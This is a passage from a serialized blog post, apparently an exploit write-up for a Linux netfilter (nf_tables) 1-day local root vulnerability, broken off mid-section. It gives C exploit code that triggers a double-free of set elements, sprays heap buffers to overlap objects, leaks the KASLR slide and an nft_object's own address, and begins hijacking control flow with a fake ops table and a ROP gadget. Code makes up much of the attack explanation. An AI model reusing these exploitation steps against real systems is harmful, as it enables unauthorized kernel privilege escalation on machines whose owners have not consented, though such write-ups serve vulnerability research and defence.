",{"type":28,"tag":116,"props":54563,"children":54564},{"style":563},[54565],{"type":33,"value":54280},{"type":28,"tag":116,"props":54567,"children":54568},{"style":266},[54569],{"type":33,"value":825},{"type":28,"tag":116,"props":54571,"children":54572},{"style":350},[54573],{"type":33,"value":54289},{"type":28,"tag":116,"props":54575,"children":54576},{"style":266},[54577],{"type":33,"value":895},{"type":28,"tag":116,"props":54579,"children":54580},{"class":245,"line":1580},[54581,54585,54589,54593,54597,54601,54606,54610],{"type":28,"tag":116,"props":54582,"children":54583},{"style":282},[54584],{"type":33,"value":54540},{"type":28,"tag":116,"props":54586,"children":54587},{"style":266},[54588],{"type":33,"value":313},{"type":28,"tag":116,"props":54590,"children":54591},{"style":272},[54592],{"type":33,"value":51682},{"type":28,"tag":116,"props":54594,"children":54595},{"style":266},[54596],{"type":33,"value":347},{"type":28,"tag":116,"props":54598,"children":54599},{"style":350},[54600],{"type":33,"value":16957},{"type":28,"tag":116,"props":54602,"children":54603},{"style":266},[54604],{"type":33,"value":54605},"], NFTNL_SET_ELEM_KEY, ",{"type":28,"tag":116,"props":54607,"children":54608},{"style":370},[54609],{"type":33,"value":2780},{"type":28,"tag":116,"props":54611,"children":54612},{"style":266},[54613],{"type":33,"value":54322},{"type":28,"tag":116,"props":54615,"children":54616},{"class":245,"line":1620},[54617,54622,54626,54630,54634,54638],{"type":28,"tag":116,"props":54618,"children":54619},{"style":282},[54620],{"type":33,"value":54621},"    nftnl_set_elem_add",{"type":28,"tag":116,"props":54623,"children":54624},{"style":266},[54625],{"type":33,"value":54364},{"type":28,"tag":116,"props":54627,"children":54628},{"style":272},[54629],{"type":33,"value":51682},{"type":28,"tag":116,"props":54631,"children":54632},{"style":266},[54633],{"type":33,"value":347},{"type":28,"tag":116,"props":54635,"children":54636},{"style":350},[54637],{"type":33,"value":16957},{"type":28,"tag":116,"props":54639,"children":54640},{"style":266},[54641],{"type":33,"value":3422},{"type":28,"tag":116,"props":54643,"children":54644},{"class":245,"line":1668},[54645],{"type":28,"tag":116,"props":54646,"children":54647},{"style":266},[54648],{"type":33,"value":9986},{"type":28,"tag":116,"props":54650,"children":54651},{"class":245,"line":1677},[54652],{"type":28,"tag":116,"props":54653,"children":54654},{"emptyLinePlaceholder":19},[54655],{"type":33,"value":1044},{"type":28,"tag":116,"props":54657,"children":54658},{"class":245,"line":1685},[54659],{"type":28,"tag":116,"props":54660,"children":54661},{"style":266},[54662],{"type":33,"value":54663},"    // double-free commited elems\n",{"type":28,"tag":116,"props":54665,"children":54666},{"class":245,"line":1729},[54667],{"type":28,"tag":116,"props":54668,"children":54669},{"style":266},[54670],{"type":33,"value":9986},{"type":28,"tag":116,"props":54672,"children":54673},{"class":245,"line":1764},[54674,54679,54683],{"type":28,"tag":116,"props":54675,"children":54676},{"style":266},[54677],{"type":33,"value":54678},"    nftnl_set_free(",{"type":28,"tag":116,"props":54680,"children":54681},{"style":339},[54682],{"type":33,"value":50639},{"type":28,"tag":116,"props":54684,"children":54685},{"style":266},[54686],{"type":33,"value":895},{"type":28,"tag":116,"props":54688,"children":54689},{"class":245,"line":1896},[54690],{"type":28,"tag":116,"props":54691,"children":54692},{"style":266},[54693],{"type":33,"value":406},{"type":28,"tag":116,"props":54695,"children":54696},{"class":245,"line":1932},[54697],{"type":28,"tag":116,"props":54698,"children":54699},{"style":266},[54700],{"type":33,"value":9986},{"type":28,"tag":75,"props":54702,"children":54704},{"id":54703},"leaking-kaslr",[54705],{"type":33,"value":54706},"Leaking KASLR",{"type":28,"tag":29,"props":54708,"children":54709},{},[54710,54712,54718,54720,54725,54727,54733,54735,54741,54743],{"type":33,"value":54711},"Tables contain an outline user data buffer ",{"type":28,"tag":98,"props":54713,"children":54715},{"className":54714},[],[54716],{"type":33,"value":54717},"udata",{"type":33,"value":54719}," that we can both read and write. By allocating a ",{"type":28,"tag":98,"props":54721,"children":54723},{"className":54722},[],[54724],{"type":33,"value":54717},{"type":33,"value":54726}," buffer on the double-free slot and then overlapping it with an ",{"type":28,"tag":98,"props":54728,"children":54730},{"className":54729},[],[54731],{"type":33,"value":54732},"nft_object",{"type":33,"value":54734}," we can leak the ",{"type":28,"tag":98,"props":54736,"children":54738},{"className":54737},[],[54739],{"type":33,"value":54740},"->ops",{"type":33,"value":54742}," pointer, and use it to calculate the KASLR slide.\n",{"type":28,"tag":206,"props":54744,"children":54746},{"alt":50198,"src":54745},"/posts/netfilter-universal-root-1-day/kaslr.png",[],{"type":28,"tag":234,"props":54748,"children":54750},{"className":28765,"code":54749,"language":28767,"meta":7,"style":7},"[...]\n    // spray 3 udata buffers to consume elems A, B and A again\n    udata_spray(nl, 0xe8, 0, 3, NULL);\n\n    // check if overlap happened (i.e if we have to overlapping udata buffers)\n    char spray_name[16];\n    char *udata[3];\n    for (int i = 0; i \u003C 3; i++)\n    {\n        snprintf(spray_name, sizeof(spray_name), \"spray-%i\", i);\n        udata[i] = getudata(nl, spray_name);\n    }\n    if (udata[0][0] == udata[2][0])\n    {\n        puts(\"[+] got duplicated table\");\n    }\n\n    // Replace one of the udata buffers with nft_object\n    // and read it's counterpart to leak the nft_object struct\n    puts(\"[*] Info leak\");\n    deludata_spray(nl, 0, 1);\n    wait_destroyer();\n    obj_spray(nl, 0, 1, NULL, 0);\n    uint64_t *fake_obj = (uint64_t *)getudata(nl, \"spray-2\");\n[...]\n",[54751],{"type":28,"tag":98,"props":54752,"children":54753},{"__ignoreMap":7},[54754,54761,54769,54804,54811,54819,54844,54871,54922,54929,54962,54988,54995,55060,55067,55088,55095,55102,55110,55118,55139,55168,55180,55224,55280],{"type":28,"tag":116,"props":54755,"children":54756},{"class":245,"line":246},[54757],{"type":28,"tag":116,"props":54758,"children":54759},{"style":266},[54760],{"type":33,"value":9986},{"type":28,"tag":116,"props":54762,"children":54763},{"class":245,"line":256},[54764],{"type":28,"tag":116,"props":54765,"children":54766},{"style":266},[54767],{"type":33,"value":54768},"    // spray 3 udata buffers to consume elems A, B and A again\n",{"type":28,"tag":116,"props":54770,"children":54771},{"class":245,"line":293},[54772,54777,54781,54786,54791,54796,54800],{"type":28,"tag":116,"props":54773,"children":54774},{"style":266},[54775],{"type":33,"value":54776},"    udata_spray(",{"type":28,"tag":116,"props":54778,"children":54779},{"style":339},[54780],{"type":33,"value":53908},{"type":28,"tag":116,"props":54782,"children":54783},{"style":266},[54784],{"type":33,"value":54785},", 0",{"type":28,"tag":116,"props":54787,"children":54788},{"style":339},[54789],{"type":33,"value":54790},"xe8",{"type":28,"tag":116,"props":54792,"children":54793},{"style":266},[54794],{"type":33,"value":54795},", 0, 3, ",{"type":28,"tag":116,"props":54797,"children":54798},{"style":339},[54799],{"type":33,"value":54114},{"type":28,"tag":116,"props":54801,"children":54802},{"style":266},[54803],{"type":33,"value":895},{"type":28,"tag":116,"props":54805,"children":54806},{"class":245,"line":361},[54807],{"type":28,"tag":116,"props":54808,"children":54809},{"emptyLinePlaceholder":19},[54810],{"type":33,"value":1044},{"type":28,"tag":116,"props":54812,"children":54813},{"class":245,"line":387},[54814],{"type":28,"tag":116,"props":54815,"children":54816},{"style":250},[54817],{"type":33,"value":54818},"    // check if overlap happened (i.e if we have to overlapping udata buffers)\n",{"type":28,"tag":116,"props":54820,"children":54821},{"class":245,"line":400},[54822,54827,54832,54836,54840],{"type":28,"tag":116,"props":54823,"children":54824},{"style":376},[54825],{"type":33,"value":54826},"    char",{"type":28,"tag":116,"props":54828,"children":54829},{"style":272},[54830],{"type":33,"value":54831}," spray_name",{"type":28,"tag":116,"props":54833,"children":54834},{"style":266},[54835],{"type":33,"value":347},{"type":28,"tag":116,"props":54837,"children":54838},{"style":350},[54839],{"type":33,"value":40467},{"type":28,"tag":116,"props":54841,"children":54842},{"style":266},[54843],{"type":33,"value":31223},{"type":28,"tag":116,"props":54845,"children":54846},{"class":245,"line":614},[54847,54851,54855,54859,54863,54867],{"type":28,"tag":116,"props":54848,"children":54849},{"style":376},[54850],{"type":33,"value":54826},{"type":28,"tag":116,"props":54852,"children":54853},{"style":370},[54854],{"type":33,"value":9484},{"type":28,"tag":116,"props":54856,"children":54857},{"style":272},[54858],{"type":33,"value":54717},{"type":28,"tag":116,"props":54860,"children":54861},{"style":266},[54862],{"type":33,"value":347},{"type":28,"tag":116,"props":54864,"children":54865},{"style":350},[54866],{"type":33,"value":16957},{"type":28,"tag":116,"props":54868,"children":54869},{"style":266},[54870],{"type":33,"value":31223},{"type":28,"tag":116,"props":54872,"children":54873},{"class":245,"line":631},[54874,54878,54882,54886,54890,54894,54898,54902,54906,54910,54914,54918],{"type":28,"tag":116,"props":54875,"children":54876},{"style":260},[54877],{"type":33,"value":2703},{"type":28,"tag":116,"props":54879,"children":54880},{"style":266},[54881],{"type":33,"value":269},{"type":28,"tag":116,"props":54883,"children":54884},{"style":376},[54885],{"type":33,"value":18710},{"type":28,"tag":116,"props":54887,"children":54888},{"style":266},[54889],{"type":33,"value":54162},{"type":28,"tag":116,"props":54891,"children":54892},{"style":370},[54893],{"type":33,"value":373},{"type":28,"tag":116,"props":54895,"children":54896},{"style":350},[54897],{"type":33,"value":2718},{"type":28,"tag":116,"props":54899,"children":54900},{"style":266},[54901],{"type":33,"value":50852},{"type":28,"tag":116,"props":54903,"children":54904},{"style":370},[54905],{"type":33,"value":514},{"type":28,"tag":116,"props":54907,"children":54908},{"style":350},[54909],{"type":33,"value":18762},{"type":28,"tag":116,"props":54911,"children":54912},{"style":266},[54913],{"type":33,"value":50883},{"type":28,"tag":116,"props":54915,"children":54916},{"style":370},[54917],{"type":33,"value":50888},{"type":28,"tag":116,"props":54919,"children":54920},{"style":266},[54921],{"type":33,"value":2830},{"type":28,"tag":116,"props":54923,"children":54924},{"class":245,"line":665},[54925],{"type":28,"tag":116,"props":54926,"children":54927},{"style":266},[54928],{"type":33,"value":28842},{"type":28,"tag":116,"props":54930,"children":54931},{"class":245,"line":713},[54932,54937,54942,54947,54952,54957],{"type":28,"tag":116,"props":54933,"children":54934},{"style":282},[54935],{"type":33,"value":54936},"        snprintf",{"type":28,"tag":116,"props":54938,"children":54939},{"style":266},[54940],{"type":33,"value":54941},"(spray_name, ",{"type":28,"tag":116,"props":54943,"children":54944},{"style":376},[54945],{"type":33,"value":54946},"sizeof",{"type":28,"tag":116,"props":54948,"children":54949},{"style":266},[54950],{"type":33,"value":54951},"(spray_name), ",{"type":28,"tag":116,"props":54953,"children":54954},{"style":563},[54955],{"type":33,"value":54956},"\"spray-%i\"",{"type":28,"tag":116,"props":54958,"children":54959},{"style":266},[54960],{"type":33,"value":54961},", i);\n",{"type":28,"tag":116,"props":54963,"children":54964},{"class":245,"line":750},[54965,54970,54974,54978,54983],{"type":28,"tag":116,"props":54966,"children":54967},{"style":272},[54968],{"type":33,"value":54969},"        udata",{"type":28,"tag":116,"props":54971,"children":54972},{"style":266},[54973],{"type":33,"value":54214},{"type":28,"tag":116,"props":54975,"children":54976},{"style":370},[54977],{"type":33,"value":373},{"type":28,"tag":116,"props":54979,"children":54980},{"style":282},[54981],{"type":33,"value":54982}," getudata",{"type":28,"tag":116,"props":54984,"children":54985},{"style":266},[54986],{"type":33,"value":54987},"(nl, spray_name);\n",{"type":28,"tag":116,"props":54989,"children":54990},{"class":245,"line":779},[54991],{"type":28,"tag":116,"props":54992,"children":54993},{"style":266},[54994],{"type":33,"value":3025},{"type":28,"tag":116,"props":54996,"children":54997},{"class":245,"line":796},[54998,55002,55006,55010,55014,55018,55022,55026,55030,55034,55039,55043,55047,55051,55055],{"type":28,"tag":116,"props":54999,"children":55000},{"style":260},[55001],{"type":33,"value":11947},{"type":28,"tag":116,"props":55003,"children":55004},{"style":266},[55005],{"type":33,"value":269},{"type":28,"tag":116,"props":55007,"children":55008},{"style":272},[55009],{"type":33,"value":54717},{"type":28,"tag":116,"props":55011,"children":55012},{"style":266},[55013],{"type":33,"value":347},{"type":28,"tag":116,"props":55015,"children":55016},{"style":350},[55017],{"type":33,"value":353},{"type":28,"tag":116,"props":55019,"children":55020},{"style":266},[55021],{"type":33,"value":48579},{"type":28,"tag":116,"props":55023,"children":55024},{"style":350},[55025],{"type":33,"value":353},{"type":28,"tag":116,"props":55027,"children":55028},{"style":266},[55029],{"type":33,"value":8333},{"type":28,"tag":116,"props":55031,"children":55032},{"style":370},[55033],{"type":33,"value":2340},{"type":28,"tag":116,"props":55035,"children":55036},{"style":272},[55037],{"type":33,"value":55038}," udata",{"type":28,"tag":116,"props":55040,"children":55041},{"style":266},[55042],{"type":33,"value":347},{"type":28,"tag":116,"props":55044,"children":55045},{"style":350},[55046],{"type":33,"value":2794},{"type":28,"tag":116,"props":55048,"children":55049},{"style":266},[55050],{"type":33,"value":48579},{"type":28,"tag":116,"props":55052,"children":55053},{"style":350},[55054],{"type":33,"value":353},{"type":28,"tag":116,"props":55056,"children":55057},{"style":266},[55058],{"type":33,"value":55059},"])\n",{"type":28,"tag":116,"props":55061,"children":55062},{"class":245,"line":847},[55063],{"type":28,"tag":116,"props":55064,"children":55065},{"style":266},[55066],{"type":33,"value":28842},{"type":28,"tag":116,"props":55068,"children":55069},{"class":245,"line":898},[55070,55075,55079,55084],{"type":28,"tag":116,"props":55071,"children":55072},{"style":282},[55073],{"type":33,"value":55074},"        puts",{"type":28,"tag":116,"props":55076,"children":55077},{"style":266},[55078],{"type":33,"value":313},{"type":28,"tag":116,"props":55080,"children":55081},{"style":563},[55082],{"type":33,"value":55083},"\"[+] got duplicated table\"",{"type":28,"tag":116,"props":55085,"children":55086},{"style":266},[55087],{"type":33,"value":895},{"type":28,"tag":116,"props":55089,"children":55090},{"class":245,"line":907},[55091],{"type":28,"tag":116,"props":55092,"children":55093},{"style":266},[55094],{"type":33,"value":3025},{"type":28,"tag":116,"props":55096,"children":55097},{"class":245,"line":981},[55098],{"type":28,"tag":116,"props":55099,"children":55100},{"emptyLinePlaceholder":19},[55101],{"type":33,"value":1044},{"type":28,"tag":116,"props":55103,"children":55104},{"class":245,"line":1011},[55105],{"type":28,"tag":116,"props":55106,"children":55107},{"style":250},[55108],{"type":33,"value":55109},"    // Replace one of the udata buffers with nft_object\n",{"type":28,"tag":116,"props":55111,"children":55112},{"class":245,"line":1029},[55113],{"type":28,"tag":116,"props":55114,"children":55115},{"style":250},[55116],{"type":33,"value":55117},"    // and read it's counterpart to leak the nft_object struct\n",{"type":28,"tag":116,"props":55119,"children":55120},{"class":245,"line":1038},[55121,55126,55130,55135],{"type":28,"tag":116,"props":55122,"children":55123},{"style":282},[55124],{"type":33,"value":55125},"    puts",{"type":28,"tag":116,"props":55127,"children":55128},{"style":266},[55129],{"type":33,"value":313},{"type":28,"tag":116,"props":55131,"children":55132},{"style":563},[55133],{"type":33,"value":55134},"\"[*] Info leak\"",{"type":28,"tag":116,"props":55136,"children":55137},{"style":266},[55138],{"type":33,"value":895},{"type":28,"tag":116,"props":55140,"children":55141},{"class":245,"line":1047},[55142,55147,55152,55156,55160,55164],{"type":28,"tag":116,"props":55143,"children":55144},{"style":282},[55145],{"type":33,"value":55146},"    deludata_spray",{"type":28,"tag":116,"props":55148,"children":55149},{"style":266},[55150],{"type":33,"value":55151},"(nl, ",{"type":28,"tag":116,"props":55153,"children":55154},{"style":350},[55155],{"type":33,"value":353},{"type":28,"tag":116,"props":55157,"children":55158},{"style":266},[55159],{"type":33,"value":825},{"type":28,"tag":116,"props":55161,"children":55162},{"style":350},[55163],{"type":33,"value":1824},{"type":28,"tag":116,"props":55165,"children":55166},{"style":266},[55167],{"type":33,"value":895},{"type":28,"tag":116,"props":55169,"children":55170},{"class":245,"line":1071},[55171,55176],{"type":28,"tag":116,"props":55172,"children":55173},{"style":282},[55174],{"type":33,"value":55175},"    wait_destroyer",{"type":28,"tag":116,"props":55177,"children":55178},{"style":266},[55179],{"type":33,"value":1445},{"type":28,"tag":116,"props":55181,"children":55182},{"class":245,"line":1137},[55183,55188,55192,55196,55200,55204,55208,55212,55216,55220],{"type":28,"tag":116,"props":55184,"children":55185},{"style":282},[55186],{"type":33,"value":55187},"    obj_spray",{"type":28,"tag":116,"props":55189,"children":55190},{"style":266},[55191],{"type":33,"value":55151},{"type":28,"tag":116,"props":55193,"children":55194},{"style":350},[55195],{"type":33,"value":353},{"type":28,"tag":116,"props":55197,"children":55198},{"style":266},[55199],{"type":33,"value":825},{"type":28,"tag":116,"props":55201,"children":55202},{"style":350},[55203],{"type":33,"value":1824},{"type":28,"tag":116,"props":55205,"children":55206},{"style":266},[55207],{"type":33,"value":825},{"type":28,"tag":116,"props":55209,"children":55210},{"style":376},[55211],{"type":33,"value":54114},{"type":28,"tag":116,"props":55213,"children":55214},{"style":266},[55215],{"type":33,"value":825},{"type":28,"tag":116,"props":55217,"children":55218},{"style":350},[55219],{"type":33,"value":353},{"type":28,"tag":116,"props":55221,"children":55222},{"style":266},[55223],{"type":33,"value":895},{"type":28,"tag":116,"props":55225,"children":55226},{"class":245,"line":1181},[55227,55232,55236,55241,55245,55249,55254,55258,55262,55267,55271,55276],{"type":28,"tag":116,"props":55228,"children":55229},{"style":376},[55230],{"type":33,"value":55231},"    uint64_t",{"type":28,"tag":116,"props":55233,"children":55234},{"style":370},[55235],{"type":33,"value":9484},{"type":28,"tag":116,"props":55237,"children":55238},{"style":266},[55239],{"type":33,"value":55240},"fake_obj ",{"type":28,"tag":116,"props":55242,"children":55243},{"style":370},[55244],{"type":33,"value":373},{"type":28,"tag":116,"props":55246,"children":55247},{"style":266},[55248],{"type":33,"value":269},{"type":28,"tag":116,"props":55250,"children":55251},{"style":376},[55252],{"type":33,"value":55253},"uint64_t",{"type":28,"tag":116,"props":55255,"children":55256},{"style":370},[55257],{"type":33,"value":9484},{"type":28,"tag":116,"props":55259,"children":55260},{"style":266},[55261],{"type":33,"value":1829},{"type":28,"tag":116,"props":55263,"children":55264},{"style":282},[55265],{"type":33,"value":55266},"getudata",{"type":28,"tag":116,"props":55268,"children":55269},{"style":266},[55270],{"type":33,"value":55151},{"type":28,"tag":116,"props":55272,"children":55273},{"style":563},[55274],{"type":33,"value":55275},"\"spray-2\"",{"type":28,"tag":116,"props":55277,"children":55278},{"style":266},[55279],{"type":33,"value":895},{"type":28,"tag":116,"props":55281,"children":55282},{"class":245,"line":1212},[55283],{"type":28,"tag":116,"props":55284,"children":55285},{"style":266},[55286],{"type":33,"value":9986},{"type":28,"tag":75,"props":55288,"children":55290},{"id":55289},"leaking-self-pointer-of-nft_object",[55291,55293],{"type":33,"value":55292},"Leaking self pointer of ",{"type":28,"tag":98,"props":55294,"children":55296},{"className":55295},[],[55297],{"type":33,"value":54732},{"type":28,"tag":29,"props":55299,"children":55300},{},[55301,55303,55308,55310,55315,55317,55322,55324,55330],{"type":33,"value":55302},"As I'll discuss in more depth in the ROP section, the exploit relies on a known address of controllable memory to work. I decided to use the ",{"type":28,"tag":98,"props":55304,"children":55306},{"className":55305},[],[55307],{"type":33,"value":54732},{"type":33,"value":55309}," to get its own address. This is possible because the ",{"type":28,"tag":98,"props":55311,"children":55313},{"className":55312},[],[55314],{"type":33,"value":54732},{"type":33,"value":55316}," has a ",{"type":28,"tag":98,"props":55318,"children":55320},{"className":55319},[],[55321],{"type":33,"value":54717},{"type":33,"value":55323}," pointer (similar to ",{"type":28,"tag":98,"props":55325,"children":55327},{"className":55326},[],[55328],{"type":33,"value":55329},"table->udata",{"type":33,"value":55331}," that I used for leaking KASLR), that I can use to read/write data.",{"type":28,"tag":29,"props":55333,"children":55334},{},[55335,55336,55341,55343,55349,55351,55356,55358,55364,55366,55372,55374,55379,55381,55386,55388,55393,55395],{"type":33,"value":16275},{"type":28,"tag":98,"props":55337,"children":55339},{"className":55338},[],[55340],{"type":33,"value":54732},{"type":33,"value":55342}," struct also contains a ",{"type":28,"tag":98,"props":55344,"children":55346},{"className":55345},[],[55347],{"type":33,"value":55348},"list_head",{"type":33,"value":55350}," inserted in a circular list containing all ",{"type":28,"tag":98,"props":55352,"children":55354},{"className":55353},[],[55355],{"type":33,"value":54732},{"type":33,"value":55357},"'s that belong to a given ",{"type":28,"tag":98,"props":55359,"children":55361},{"className":55360},[],[55362],{"type":33,"value":55363},"table",{"type":33,"value":55365},". Considering that our object is currently alone in its table, the ",{"type":28,"tag":98,"props":55367,"children":55369},{"className":55368},[],[55370],{"type":33,"value":55371},"table->list.next",{"type":33,"value":55373}," pointer in the ",{"type":28,"tag":98,"props":55375,"children":55377},{"className":55376},[],[55378],{"type":33,"value":54732},{"type":33,"value":55380}," will point back to the ",{"type":28,"tag":98,"props":55382,"children":55384},{"className":55383},[],[55385],{"type":33,"value":55348},{"type":33,"value":55387}," contained in the ",{"type":28,"tag":98,"props":55389,"children":55391},{"className":55390},[],[55392],{"type":33,"value":55363},{"type":33,"value":55394}," and vice-versa.\n",{"type":28,"tag":206,"props":55396,"children":55398},{"alt":50198,"src":55397},"/posts/netfilter-universal-root-1-day/nft-object.png",[],{"type":28,"tag":29,"props":55400,"children":55401},{},[55402,55404,55409,55411,55416,55418,55424,55426,55431,55432,55437,55439,55444,55446,55451],{"type":33,"value":55403},"In short, that means that if we swap the ",{"type":28,"tag":98,"props":55405,"children":55407},{"className":55406},[],[55408],{"type":33,"value":54717},{"type":33,"value":55410}," pointer of the ",{"type":28,"tag":98,"props":55412,"children":55414},{"className":55413},[],[55415],{"type":33,"value":54732},{"type":33,"value":55417}," with its own ",{"type":28,"tag":98,"props":55419,"children":55421},{"className":55420},[],[55422],{"type":33,"value":55423},"list.next",{"type":33,"value":55425}," pointer we should be able to read a pointer back to the ",{"type":28,"tag":98,"props":55427,"children":55429},{"className":55428},[],[55430],{"type":33,"value":54732},{"type":33,"value":51957},{"type":28,"tag":98,"props":55433,"children":55435},{"className":55434},[],[55436],{"type":33,"value":55348},{"type":33,"value":55438}," which is also the start of the ",{"type":28,"tag":98,"props":55440,"children":55442},{"className":55441},[],[55443],{"type":33,"value":54732},{"type":33,"value":55445}," itself.\n",{"type":28,"tag":4995,"props":55447,"children":55448},{},[55449],{"type":33,"value":55450},"NOTE:",{"type":33,"value":55452}," This is a novel small trick.",{"type":28,"tag":234,"props":55454,"children":55456},{"className":28765,"code":55455,"language":28767,"meta":7,"style":7},"[...]\n    // Leak nft_object ptr using table linked list\n    fake_obj[8] = 8;           // ulen = 8\n    fake_obj[9] = fake_obj[0]; // udata = list->next\n    deludata_spray(nl, 2, 1);\n    wait_destroyer();\n    udata_spray(nl, 0xe8, 3, 1, fake_obj);\n\n    get_obj(nl, \"spray-0\", true);\n    printf(\"[*] nft_object ptr: 0x%lx\\n\", obj_ptr);\n[...]\n",[55457],{"type":28,"tag":98,"props":55458,"children":55459},{"__ignoreMap":7},[55460,55467,55475,55488,55536,55563,55574,55612,55619,55648,55678],{"type":28,"tag":116,"props":55461,"children":55462},{"class":245,"line":246},[55463],{"type":28,"tag":116,"props":55464,"children":55465},{"style":266},[55466],{"type":33,"value":9986},{"type":28,"tag":116,"props":55468,"children":55469},{"class":245,"line":256},[55470],{"type":28,"tag":116,"props":55471,"children":55472},{"style":266},[55473],{"type":33,"value":55474},"    // Leak nft_object ptr using table linked list\n",{"type":28,"tag":116,"props":55476,"children":55477},{"class":245,"line":293},[55478,55483],{"type":28,"tag":116,"props":55479,"children":55480},{"style":266},[55481],{"type":33,"value":55482},"    fake_obj[8] = 8;",{"type":28,"tag":116,"props":55484,"children":55485},{"style":250},[55486],{"type":33,"value":55487},"           // ulen = 8\n",{"type":28,"tag":116,"props":55489,"children":55490},{"class":245,"line":361},[55491,55496,55500,55505,55509,55513,55518,55522,55526,55531],{"type":28,"tag":116,"props":55492,"children":55493},{"style":272},[55494],{"type":33,"value":55495},"    fake_obj",{"type":28,"tag":116,"props":55497,"children":55498},{"style":266},[55499],{"type":33,"value":347},{"type":28,"tag":116,"props":55501,"children":55502},{"style":350},[55503],{"type":33,"value":55504},"9",{"type":28,"tag":116,"props":55506,"children":55507},{"style":266},[55508],{"type":33,"value":8333},{"type":28,"tag":116,"props":55510,"children":55511},{"style":370},[55512],{"type":33,"value":373},{"type":28,"tag":116,"props":55514,"children":55515},{"style":272},[55516],{"type":33,"value":55517}," fake_obj",{"type":28,"tag":116,"props":55519,"children":55520},{"style":266},[55521],{"type":33,"value":347},{"type":28,"tag":116,"props":55523,"children":55524},{"style":350},[55525],{"type":33,"value":353},{"type":28,"tag":116,"props":55527,"children":55528},{"style":266},[55529],{"type":33,"value":55530},"];",{"type":28,"tag":116,"props":55532,"children":55533},{"style":250},[55534],{"type":33,"value":55535}," // udata = list->next\n",{"type":28,"tag":116,"props":55537,"children":55538},{"class":245,"line":387},[55539,55543,55547,55551,55555,55559],{"type":28,"tag":116,"props":55540,"children":55541},{"style":282},[55542],{"type":33,"value":55146},{"type":28,"tag":116,"props":55544,"children":55545},{"style":266},[55546],{"type":33,"value":55151},{"type":28,"tag":116,"props":55548,"children":55549},{"style":350},[55550],{"type":33,"value":2794},{"type":28,"tag":116,"props":55552,"children":55553},{"style":266},[55554],{"type":33,"value":825},{"type":28,"tag":116,"props":55556,"children":55557},{"style":350},[55558],{"type":33,"value":1824},{"type":28,"tag":116,"props":55560,"children":55561},{"style":266},[55562],{"type":33,"value":895},{"type":28,"tag":116,"props":55564,"children":55565},{"class":245,"line":400},[55566,55570],{"type":28,"tag":116,"props":55567,"children":55568},{"style":282},[55569],{"type":33,"value":55175},{"type":28,"tag":116,"props":55571,"children":55572},{"style":266},[55573],{"type":33,"value":1445},{"type":28,"tag":116,"props":55575,"children":55576},{"class":245,"line":614},[55577,55582,55586,55591,55595,55599,55603,55607],{"type":28,"tag":116,"props":55578,"children":55579},{"style":282},[55580],{"type":33,"value":55581},"    udata_spray",{"type":28,"tag":116,"props":55583,"children":55584},{"style":266},[55585],{"type":33,"value":55151},{"type":28,"tag":116,"props":55587,"children":55588},{"style":350},[55589],{"type":33,"value":55590},"0xe8",{"type":28,"tag":116,"props":55592,"children":55593},{"style":266},[55594],{"type":33,"value":825},{"type":28,"tag":116,"props":55596,"children":55597},{"style":350},[55598],{"type":33,"value":16957},{"type":28,"tag":116,"props":55600,"children":55601},{"style":266},[55602],{"type":33,"value":825},{"type":28,"tag":116,"props":55604,"children":55605},{"style":350},[55606],{"type":33,"value":1824},{"type":28,"tag":116,"props":55608,"children":55609},{"style":266},[55610],{"type":33,"value":55611},", fake_obj);\n",{"type":28,"tag":116,"props":55613,"children":55614},{"class":245,"line":631},[55615],{"type":28,"tag":116,"props":55616,"children":55617},{"emptyLinePlaceholder":19},[55618],{"type":33,"value":1044},{"type":28,"tag":116,"props":55620,"children":55621},{"class":245,"line":665},[55622,55627,55631,55636,55640,55644],{"type":28,"tag":116,"props":55623,"children":55624},{"style":282},[55625],{"type":33,"value":55626},"    get_obj",{"type":28,"tag":116,"props":55628,"children":55629},{"style":266},[55630],{"type":33,"value":55151},{"type":28,"tag":116,"props":55632,"children":55633},{"style":563},[55634],{"type":33,"value":55635},"\"spray-0\"",{"type":28,"tag":116,"props":55637,"children":55638},{"style":266},[55639],{"type":33,"value":825},{"type":28,"tag":116,"props":55641,"children":55642},{"style":376},[55643],{"type":33,"value":3664},{"type":28,"tag":116,"props":55645,"children":55646},{"style":266},[55647],{"type":33,"value":895},{"type":28,"tag":116,"props":55649,"children":55650},{"class":245,"line":713},[55651,55656,55660,55665,55669,55673],{"type":28,"tag":116,"props":55652,"children":55653},{"style":282},[55654],{"type":33,"value":55655},"    printf",{"type":28,"tag":116,"props":55657,"children":55658},{"style":266},[55659],{"type":33,"value":313},{"type":28,"tag":116,"props":55661,"children":55662},{"style":563},[55663],{"type":33,"value":55664},"\"[*] nft_object ptr: 0x%lx",{"type":28,"tag":116,"props":55666,"children":55667},{"style":1836},[55668],{"type":33,"value":1839},{"type":28,"tag":116,"props":55670,"children":55671},{"style":563},[55672],{"type":33,"value":2240},{"type":28,"tag":116,"props":55674,"children":55675},{"style":266},[55676],{"type":33,"value":55677},", obj_ptr);\n",{"type":28,"tag":116,"props":55679,"children":55680},{"class":245,"line":750},[55681],{"type":28,"tag":116,"props":55682,"children":55683},{"style":266},[55684],{"type":33,"value":9986},{"type":28,"tag":75,"props":55686,"children":55688},{"id":55687},"hijacking-control-flow",[55689],{"type":33,"value":55690},"Hijacking control-flow",{"type":28,"tag":29,"props":55692,"children":55693},{},[55694,55696,55701,55703,55708,55710,55715,55717,55722,55724,55729,55731],{"type":33,"value":55695},"To hijack control-flow, we can use ",{"type":28,"tag":98,"props":55697,"children":55699},{"className":55698},[],[55700],{"type":33,"value":54732},{"type":33,"value":55702}," once again. The ",{"type":28,"tag":98,"props":55704,"children":55706},{"className":55705},[],[55707],{"type":33,"value":54732},{"type":33,"value":55709}," struct has an ",{"type":28,"tag":98,"props":55711,"children":55713},{"className":55712},[],[55714],{"type":33,"value":52288},{"type":33,"value":55716}," pointer to a function pointer table. We can swap the ",{"type":28,"tag":98,"props":55718,"children":55720},{"className":55719},[],[55721],{"type":33,"value":52288},{"type":33,"value":55723}," pointer with the ",{"type":28,"tag":98,"props":55725,"children":55727},{"className":55726},[],[55728],{"type":33,"value":54717},{"type":33,"value":55730}," pointer, taking control of the pointer table.\n",{"type":28,"tag":206,"props":55732,"children":55734},{"alt":50198,"src":55733},"/posts/netfilter-universal-root-1-day/control-flow.png",[],{"type":28,"tag":234,"props":55736,"children":55738},{"className":28765,"code":55737,"language":28767,"meta":7,"style":7},"[...]\n    // Fake ops\n    uint64_t *rop = calloc(29, sizeof(uint64_t));\n    rop[0] = kaslr_slide + 0xffffffff81988647; // push rsi; jmp qword ptr [rsi + 0x39];\n    rop[2] = kaslr_slide + NFT_CT_EXPECT_OBJ_TYPE;\n[...]\n    // Send ROP in object udata\n    del_obj(nl, \"spray-0\");\n    